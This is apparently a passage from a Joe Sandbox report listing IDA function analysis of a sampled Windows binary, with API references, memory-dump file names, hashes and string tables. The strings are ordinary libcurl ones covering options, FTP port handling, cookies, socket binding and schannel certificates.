"', xrefs: 00007FF7F1D9CAC6
CURLOPT_DIRLISTONLY, xrefs: 00007FF7F1D9C6B0
CURLOPT_NETRC, xrefs: 00007FF7F1D9C746
CURLOPT_PROXYHEADER, xrefs: 00007FF7F1D9CBA3
CURLOPT_ACCEPT_ENCODING, xrefs: 00007FF7F1D9CCC3
CURLOPT_NETRC_FILE, xrefs: 00007FF7F1D9C771
v', xrefs: 00007FF7F1D9CCCA
!X, xrefs: 00007FF7F1D9C65A
QV, xrefs: 00007FF7F1D9C82A
V, xrefs: 00007FF7F1D9C78E
M, xrefs: 00007FF7F1D9C758
CURLOPT_HTTPHEADER, xrefs: 00007FF7F1D9CA55
CURLOPT_HTTPAUTH, xrefs: 00007FF7F1D9CA2A
HTTP/0.9 is not supported in this build!, xrefs: 00007FF7F1D9CD4C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __swprintf_l$free
String ID: "'$5$CURLOPT_ACCEPT_ENCODING$CURLOPT_APPEND$CURLOPT_AUTOREFERER$CURLOPT_DIRLISTONLY$CURLOPT_ERRORBUFFER$CURLOPT_FAILONERROR$CURLOPT_FOLLOWLOCATION$CURLOPT_HEADEROPT$CURLOPT_HTTP09_ALLOWED$CURLOPT_HTTPAUTH$CURLOPT_HTTPHEADER$CURLOPT_HTTP_VERSION$CURLOPT_LOGIN_OPTIONS$CURLOPT_MAXREDIRS$CURLOPT_MIME_OPTIONS$CURLOPT_NETRC$CURLOPT_NETRC_FILE$CURLOPT_NOPROXY$CURLOPT_POSTFIELDS$CURLOPT_POSTFIELDSIZE_LARGE$CURLOPT_POSTREDIR$CURLOPT_PROXYAUTH$CURLOPT_PROXYHEADER$CURLOPT_RANGE$CURLOPT_REFERER$CURLOPT_REQUEST_TARGET$CURLOPT_SUPPRESS_CONNECT_HEADERS$CURLOPT_TIMEOUT_MS$CURLOPT_TRANSFERTEXT$CURLOPT_TRANSFER_ENCODING$CURLOPT_UNRESTRICTED_AUTH$CURLOPT_UPLOAD$CURLOPT_USERAGENT$CURLOPT_USERPWD$D$HTTP/0.9 is not supported in this build!$v'$ V$!X$QV$aT$tR$M$V
API String ID: 1144208884-223163314
Opcode ID: 70b3ba7b47507934b5f763d8a7dc68f7ba67d47251894a02df1358efe3a694ef
Instruction ID: fe051c7ded2b8d06e92a719895de94d64459158e3a6b4a4e8eff318f4840eb2b
Opcode Fuzzy Hash: 70b3ba7b47507934b5f763d8a7dc68f7ba67d47251894a02df1358efe3a694ef
Instruction Fuzzy Hash: 4802E675A09B8286E724EB11E44019AF7B9FB887C4F844235EAAD43BA9DF7CD314C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1D9C571 Relevance: 57.9, Strings: 46, Instructions: 402COMMON

Download Yara Rule

Strings

CURLOPT_USERPWD, xrefs: 00007FF7F1D9C810
CURLOPT_UNRESTRICTED_AUTH, xrefs: 00007FF7F1D9CB3E
CURLOPT_POSTFIELDS, xrefs: 00007FF7F1D9C8F5
aT, xrefs: 00007FF7F1D9CA1A
CURLOPT_NOPROXY, xrefs: 00007FF7F1D9C5A5
CURLOPT_UPLOAD, xrefs: 00007FF7F1D9C67B
CURLOPT_ERRORBUFFER, xrefs: 00007FF7F1D9C872
CURLOPT_TRANSFERTEXT, xrefs: 00007FF7F1D9C7AF
CURLOPT_PROXYAUTH, xrefs: 00007FF7F1D9C581
tR, xrefs: 00007FF7F1D9CC07
CURLOPT_USERAGENT, xrefs: 00007FF7F1D9CABF
CURLOPT_LOGIN_OPTIONS, xrefs: 00007FF7F1D9C7DC
CURLOPT_REFERER, xrefs: 00007FF7F1D9CA91
CURLOPT_TIMEOUT_MS, xrefs: 00007FF7F1D9C8B7
CURLOPT_FAILONERROR, xrefs: 00007FF7F1D9C61C
CURLOPT_APPEND, xrefs: 00007FF7F1D9C6E5
CURLOPT_FOLLOWLOCATION, xrefs: 00007FF7F1D9CB09
CURLOPT_HTTP_VERSION, xrefs: 00007FF7F1D9CC41
CURLOPT_MIME_OPTIONS, xrefs: 00007FF7F1D9C9FE
5, xrefs: 00007FF7F1D9C7B6
D, xrefs: 00007FF7F1D9CBF5
CURLOPT_HTTP09_ALLOWED, xrefs: 00007FF7F1D9CD2D
CURLOPT_MAXREDIRS, xrefs: 00007FF7F1D9CBEE
CURLOPT_RANGE, xrefs: 00007FF7F1D9C841
CURLOPT_REQUEST_TARGET, xrefs: 00007FF7F1D9C641
CURLOPT_POSTREDIR, xrefs: 00007FF7F1D9CC92
CURLOPT_TRANSFER_ENCODING, xrefs: 00007FF7F1D9CCED
CURLOPT_SUPPRESS_CONNECT_HEADERS, xrefs: 00007FF7F1D9C5E0
CURLOPT_AUTOREFERER, xrefs: 00007FF7F1D9CB73
CURLOPT_POSTFIELDSIZE_LARGE, xrefs: 00007FF7F1D9C926
V, xrefs: 00007FF7F1D9C85B
CURLOPT_HEADEROPT, xrefs: 00007FF7F1D9CBB5
"', xrefs: 00007FF7F1D9CAC6
CURLOPT_DIRLISTONLY, xrefs: 00007FF7F1D9C6B0
CURLOPT_NETRC, xrefs: 00007FF7F1D9C746
CURLOPT_PROXYHEADER, xrefs: 00007FF7F1D9CBA3
CURLOPT_ACCEPT_ENCODING, xrefs: 00007FF7F1D9CCC3
CURLOPT_NETRC_FILE, xrefs: 00007FF7F1D9C771
v', xrefs: 00007FF7F1D9CCCA
!X, xrefs: 00007FF7F1D9C65A
QV, xrefs: 00007FF7F1D9C82A
V, xrefs: 00007FF7F1D9C78E
M, xrefs: 00007FF7F1D9C758
CURLOPT_HTTPHEADER, xrefs: 00007FF7F1D9CA55
CURLOPT_HTTPAUTH, xrefs: 00007FF7F1D9CA2A
HTTP/0.9 is not supported in this build!, xrefs: 00007FF7F1D9CD4C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __swprintf_l$free
String ID: "'$5$CURLOPT_ACCEPT_ENCODING$CURLOPT_APPEND$CURLOPT_AUTOREFERER$CURLOPT_DIRLISTONLY$CURLOPT_ERRORBUFFER$CURLOPT_FAILONERROR$CURLOPT_FOLLOWLOCATION$CURLOPT_HEADEROPT$CURLOPT_HTTP09_ALLOWED$CURLOPT_HTTPAUTH$CURLOPT_HTTPHEADER$CURLOPT_HTTP_VERSION$CURLOPT_LOGIN_OPTIONS$CURLOPT_MAXREDIRS$CURLOPT_MIME_OPTIONS$CURLOPT_NETRC$CURLOPT_NETRC_FILE$CURLOPT_NOPROXY$CURLOPT_POSTFIELDS$CURLOPT_POSTFIELDSIZE_LARGE$CURLOPT_POSTREDIR$CURLOPT_PROXYAUTH$CURLOPT_PROXYHEADER$CURLOPT_RANGE$CURLOPT_REFERER$CURLOPT_REQUEST_TARGET$CURLOPT_SUPPRESS_CONNECT_HEADERS$CURLOPT_TIMEOUT_MS$CURLOPT_TRANSFERTEXT$CURLOPT_TRANSFER_ENCODING$CURLOPT_UNRESTRICTED_AUTH$CURLOPT_UPLOAD$CURLOPT_USERAGENT$CURLOPT_USERPWD$D$HTTP/0.9 is not supported in this build!$v'$ V$!X$QV$aT$tR$M$V
API String ID: 1144208884-223163314
Opcode ID: c89d5e06937abe97a4eee15252bc2f3268edd5fb744d9db88e930b3e6f67e44b
Instruction ID: 22b93ef3530b49e21af5c75f5e32d3344ffe614707e0f45800567c67f33a42fb
Opcode Fuzzy Hash: c89d5e06937abe97a4eee15252bc2f3268edd5fb744d9db88e930b3e6f67e44b
Instruction Fuzzy Hash: C502E675A09B8286E724EB11E44019AF7B9FB887C4F844235EAAD43BA9DF7CD314C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DD2930 Relevance: 56.5, APIs: 19, Strings: 13, Instructions: 473networkstringCOMMON

Download Yara Rule

APIs

strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DD2AA1
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DD2ADE
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DD2B02
getsockname.WS2_32 ref: 00007FF7F1DD2B69
WSAGetLastError.WS2_32 ref: 00007FF7F1DD2B73
WSAGetLastError.WS2_32 ref: 00007FF7F1DD2C5D
htons.WS2_32 ref: 00007FF7F1DD2CC1
bind.WS2_32 ref: 00007FF7F1DD2CD9
WSAGetLastError.WS2_32 ref: 00007FF7F1DD2CE7
getsockname.WS2_32 ref: 00007FF7F1DD2D35
WSAGetLastError.WS2_32 ref: 00007FF7F1DD2D62
getsockname.WS2_32 ref: 00007FF7F1DD2DDA
listen.WS2_32 ref: 00007FF7F1DD2DF1
WSAGetLastError.WS2_32 ref: 00007FF7F1DD2DFB
htons.WS2_32 ref: 00007FF7F1DD2E83
__swprintf_l.LIBCMT ref: 00007FF7F1DD2F30
__swprintf_l.LIBCMT ref: 00007FF7F1DD2F59
__swprintf_l.LIBCMT ref: 00007FF7F1DD2FD8

Strings

bind(port=%hu) failed: %s, xrefs: 00007FF7F1DD2DAA
,%d,%d, xrefs: 00007FF7F1DD2F1E
bind() failed, we ran out of ports, xrefs: 00007FF7F1DD302B
%s |%d|%s|%hu|, xrefs: 00007FF7F1DD2FA4
getsockname() failed: %s, xrefs: 00007FF7F1DD2B87, 00007FF7F1DD2D73
%s %s, xrefs: 00007FF7F1DD2F52
Failure sending EPRT command: %s, xrefs: 00007FF7F1DD2FF2
bind(port=%hu) on non-local address failed: %s, xrefs: 00007FF7F1DD2D0D
failed to resolve the address provided to PORT: %s, xrefs: 00007FF7F1DD3042
Failure sending PORT command: %s, xrefs: 00007FF7F1DD2F73
EPRT, xrefs: 00007FF7F1DD2F99
PORT, xrefs: 00007FF7F1DD2F4B
socket failure: %s, xrefs: 00007FF7F1DD2C7A, 00007FF7F1DD2E0C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast$__swprintf_lgetsockname$htonsstrtoul$bindlistenstrncpy
String ID: %s %s$%s |%d|%s|%hu|$,%d,%d$EPRT$Failure sending EPRT command: %s$Failure sending PORT command: %s$PORT$bind() failed, we ran out of ports$bind(port=%hu) failed: %s$bind(port=%hu) on non-local address failed: %s$failed to resolve the address provided to PORT: %s$getsockname() failed: %s$socket failure: %s
API String ID: 1221807063-3876000827
Opcode ID: 6bb9cb6eaabdf09b76c790faaf4da649024a4b2638681c784dadd1df45279a0b
Instruction ID: c0a374113fad95d4e773bebcd218ef31eb1808a1c6c3bfe7200d8bb3f1f45280
Opcode Fuzzy Hash: 6bb9cb6eaabdf09b76c790faaf4da649024a4b2638681c784dadd1df45279a0b
Instruction Fuzzy Hash: 9212C362A0C79281EB14BB25A4402BAB3B1FF45B88FC44135DA6E477C9DFBCE445C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DB49D0 Relevance: 53.5, APIs: 9, Strings: 21, Instructions: 975stringCOMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,00000000,00000001,00000001,00000000,00001388,00000000,00007FF7F1DB590C), ref: 00007FF7F1DB4A42
strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DB4C16
strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DB4C3B
strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DB5109
strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DB5268
strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DB527B
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00007FF7F1DADE4D), ref: 00007FF7F1DB580A
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00007FF7F1DADE4D), ref: 00007FF7F1DB58A9

Strings

httponly, xrefs: 00007FF7F1DB4CE2
%s cookie %s="%s" for domain %s, path %s, expire %I64d, xrefs: 00007FF7F1DB55C3
none, xrefs: 00007FF7F1DB57B7
version, xrefs: 00007FF7F1DB4E4F
max-age, xrefs: 00007FF7F1DB4E75
Replaced, xrefs: 00007FF7F1DB55AD
TRUE, xrefs: 00007FF7F1DB5261, 00007FF7F1DB5304, 00007FF7F1DB5340
%4095[^;=] =%4095[^;], xrefs: 00007FF7F1DB4AE6
localhost, xrefs: 00007FF7F1DB4D77
domain, xrefs: 00007FF7F1DB4D5B
WARNING: failed to open cookie file "%s", xrefs: 00007FF7F1DB5838
secure, xrefs: 00007FF7F1DB4CAE
skipped cookie with bad tailmatch domain: %s, xrefs: 00007FF7F1DB4E07
path, xrefs: 00007FF7F1DB4D0D
oversized cookie dropped, name/val %zu + %zu bytes, xrefs: 00007FF7F1DB4F8A
Added, xrefs: 00007FF7F1DB55B9
FALSE, xrefs: 00007FF7F1DB5274
__Secure-, xrefs: 00007FF7F1DB4C0F, 00007FF7F1DB51FD
#HttpOnly_, xrefs: 00007FF7F1DB50FF
expires, xrefs: 00007FF7F1DB4E9B
__Host-, xrefs: 00007FF7F1DB4C34, 00007FF7F1DB521F

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: strncmp$strcmp$__acrt_iob_func_time64fclose
String ID: #HttpOnly_$%4095[^;=] =%4095[^;]$%s cookie %s="%s" for domain %s, path %s, expire %I64d$Added$FALSE$Replaced$TRUE$WARNING: failed to open cookie file "%s"$__Host-$__Secure-$domain$expires$httponly$localhost$max-age$none$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version
API String ID: 2920273863-749307724
Opcode ID: 2a3735125d465d9038771dfe4a2ceceefc8435c8ef398494971df7135751f7b0
Instruction ID: b52b3dd29e125a51f594dc47121e8eb80cc1c5ce4c6b56b839fdc311f30b30a0
Opcode Fuzzy Hash: 2a3735125d465d9038771dfe4a2ceceefc8435c8ef398494971df7135751f7b0
Instruction Fuzzy Hash: BF92BF21A0D786A1FF64EB2994402B9A7B0FF58B84F844035CA6F077D6DFBCE45487A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DB2B14 Relevance: 40.5, APIs: 14, Strings: 9, Instructions: 245networkstringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DB2BE4
strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DB2C1B
inet_pton.WS2_32 ref: 00007FF7F1DB2D0C
htons.WS2_32 ref: 00007FF7F1DB2D1F
bind.WS2_32 ref: 00007FF7F1DB2D49
inet_pton.WS2_32 ref: 00007FF7F1DB2D71
htons.WS2_32 ref: 00007FF7F1DB2D84
htons.WS2_32 ref: 00007FF7F1DB2DBF
htons.WS2_32 ref: 00007FF7F1DB2DEF
htons.WS2_32 ref: 00007FF7F1DB2E30
bind.WS2_32 ref: 00007FF7F1DB2E46
getsockname.WS2_32 ref: 00007FF7F1DB2E72
WSAGetLastError.WS2_32 ref: 00007FF7F1DB2E7C
WSAGetLastError.WS2_32 ref: 00007FF7F1DB2EB2

Strings

Couldn't bind to interface '%s', xrefs: 00007FF7F1DB2BF2
if!, xrefs: 00007FF7F1DB2BDA
Bind to local port %hu failed, trying next, xrefs: 00007FF7F1DB2E1A
Couldn't bind to '%s', xrefs: 00007FF7F1DB2D9C
getsockname() failed with errno %d: %s, xrefs: 00007FF7F1DB2E98
host!, xrefs: 00007FF7F1DB2C11
Local port: %hu, xrefs: 00007FF7F1DB2ED8
Name '%s' family %i resolved to '%s' family %i, xrefs: 00007FF7F1DB2CB7
bind failed with errno %d: %s, xrefs: 00007FF7F1DB2ECB

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: htons$ErrorLastbindinet_ptonstrncmp$getsockname
String ID: Bind to local port %hu failed, trying next$Couldn't bind to '%s'$Couldn't bind to interface '%s'$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$getsockname() failed with errno %d: %s$host!$if!
API String ID: 3536004664-1901189404
Opcode ID: 92930e1a0554cb5abf70b28e1d484720b4bdbb8f2e83e3d6713fd1ba7309806d
Instruction ID: b7682e08a3168dd00c737fba5c5da39deb6790977e4a7d03686abad7fd9f6348
Opcode Fuzzy Hash: 92930e1a0554cb5abf70b28e1d484720b4bdbb8f2e83e3d6713fd1ba7309806d
Instruction Fuzzy Hash: 43B1F362A1868291E714EB29E4406B9A770FF44B84FC0403AEE6F476D4DFFCE504C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DD8350 Relevance: 31.8, APIs: 14, Strings: 4, Instructions: 285networkCOMMON

Download Yara Rule

APIs

WSACreateEvent.WS2_32 ref: 00007FF7F1DD8425
WSAGetLastError.WS2_32 ref: 00007FF7F1DD8433

Strings

WSAEnumNetworkEvents failed (%d), xrefs: 00007FF7F1DD86A4
WSACloseEvent failed (%d), xrefs: 00007FF7F1DD876B
WSACreateEvent failed (%d), xrefs: 00007FF7F1DD8439
Time-out, xrefs: 00007FF7F1DD8744

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: CreateErrorEventLast
String ID: Time-out$WSACloseEvent failed (%d)$WSACreateEvent failed (%d)$WSAEnumNetworkEvents failed (%d)
API String ID: 545576003-1941740749
Opcode ID: a71da43479d1dcac11b2877f77ad2c18c13b94b794761e5cd4ccdb7b84bd3623
Instruction ID: 2ad2ae83f0d2cc5ff0c6ec160fd544d0ed205cc30bcda4c74c8cb51e988aff37
Opcode Fuzzy Hash: a71da43479d1dcac11b2877f77ad2c18c13b94b794761e5cd4ccdb7b84bd3623
Instruction Fuzzy Hash: 6DC1B132B0964286EB55AB26A4103BDB3B1BF48B98F844435DD2E877D4DFBCE445C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DE8F14 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 137encryptionCOMMON

Download Yara Rule

APIs

CryptQueryObject.CRYPT32 ref: 00007FF7F1DE901A
CertAddCertificateContextToStore.CRYPT32 ref: 00007FF7F1DE9043
CertFreeCertificateContext.CRYPT32 ref: 00007FF7F1DE9050
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DE9062

Strings

schannel: failed to extract certificate from CA file '%s': %s, xrefs: 00007FF7F1DE90A1
schannel: did not add any certificates from CA file '%s', xrefs: 00007FF7F1DE90DC
-----BEGIN CERTIFICATE-----, xrefs: 00007FF7F1DE8F68
schannel: added %d certificate(s) from CA file '%s', xrefs: 00007FF7F1DE90ED
schannel: failed to add certificate from CA file '%s' to certificate store: %s, xrefs: 00007FF7F1DE9073
-----END CERTIFICATE-----, xrefs: 00007FF7F1DE8F9E
schannel: unexpected content type '%d' when extracting certificate from CA file '%s', xrefs: 00007FF7F1DE907F
schannel: CA file '%s' is not correctly formatted, xrefs: 00007FF7F1DE90BB

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: CertCertificateContext$CryptErrorFreeLastObjectQueryStore
String ID: -----END CERTIFICATE-----$-----BEGIN CERTIFICATE-----$schannel: CA file '%s' is not correctly formatted$schannel: added %d certificate(s) from CA file '%s'$schannel: did not add any certificates from CA file '%s'$schannel: failed to add certificate from CA file '%s' to certificate store: %s$schannel: failed to extract certificate from CA file '%s': %s$schannel: unexpected content type '%d' when extracting certificate from CA file '%s'
API String ID: 854292303-665156428
Opcode ID: 2ba88eb4ac4351e0ce57621135a28c58eaed0a47a29328f89bdaa95b271ba41b
Instruction ID: ae41c2921806bcfa21fbc99abd72e13db24e9828b848645dad6adb658c6a30d3
Opcode Fuzzy Hash: 2ba88eb4ac4351e0ce57621135a28c58eaed0a47a29328f89bdaa95b271ba41b
Instruction Fuzzy Hash: D651C272B0865285EB18AB16E8102A9EBB4FB847C9FC08035DE5E077D5DFBCE145C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DA9B60 Relevance: 17.9, APIs: 5, Strings: 5, Instructions: 447COMMON

Download Yara Rule

Strings

file, xrefs: 00007FF7F1DA9C5B
%s://%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s, xrefs: 00007FF7F1DAA039
file://%s%s%s, xrefs: 00007FF7F1DA9C91
https, xrefs: 00007FF7F1DA9CD0
%%25%s], xrefs: 00007FF7F1DA9DD2

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID:
String ID: %%25%s]$%s://%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$file$file://%s%s%s$https
API String ID: 0-1669851433
Opcode ID: 55ad73ff8bd182c5e7edf142535e21b4b3863f18256ac5d8263d90e22a4e6501
Instruction ID: ab9eaf45061a4cab56b7447502bfedb97e0d52d22686184d00eadfed5b376dde
Opcode Fuzzy Hash: 55ad73ff8bd182c5e7edf142535e21b4b3863f18256ac5d8263d90e22a4e6501
Instruction Fuzzy Hash: F312C522A0DB8685EB69EB15E450379A3B0EF04B84F944131DE6D437DADFBDE845C3A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DA7BAC Relevance: 17.9, APIs: 6, Strings: 4, Instructions: 414stringCOMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DA7FBD
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DA7FC6
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DA7FDF
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DA7FE7
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DA7FF2
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DA7FFD

Strings

%31[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz], xrefs: 00007FF7F1DA7DCD
GMT, xrefs: 00007FF7F1DA7E9F
%02d:%02d%n, xrefs: 00007FF7F1DA7F98
%02d:%02d:%02d%n, xrefs: 00007FF7F1DA7F62

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: _errno$strtol
String ID: %02d:%02d%n$%02d:%02d:%02d%n$%31[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz]$GMT
API String ID: 3596500743-988243589
Opcode ID: a61c42e7b25da293dd4288a588b2f0515b78c60a16bd8d9941b6d6054f0bc75c
Instruction ID: 845787eb0d1d5d2df24d6f4c8a9b12e7efb7409f3950527a48417cf763e49a21
Opcode Fuzzy Hash: a61c42e7b25da293dd4288a588b2f0515b78c60a16bd8d9941b6d6054f0bc75c
Instruction Fuzzy Hash: 30F1E573F08A124AFB24EF69D8001BCB7B1AB45369F904235DE3E577D5DBB8A9018790

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DE934C Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 140encryptionCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F1DA3968: GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7F1DA399D
Part of subcall function 00007FF7F1DA3968: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7F1DA39AD

CertGetNameStringA.CRYPT32 ref: 00007FF7F1DE93B9

Strings

schannel: Not enough memory to list all host names., xrefs: 00007FF7F1DE94F2
schannel: CertFindExtension() returned no extension., xrefs: 00007FF7F1DE942C
schannel: Null certificate info., xrefs: 00007FF7F1DE9404
2.5.29.17, xrefs: 00007FF7F1DE9414, 00007FF7F1DE9446
schannel: Null certificate context., xrefs: 00007FF7F1DE93E4
schannel: CryptDecodeObjectEx() returned no alternate name information., xrefs: 00007FF7F1DE9481
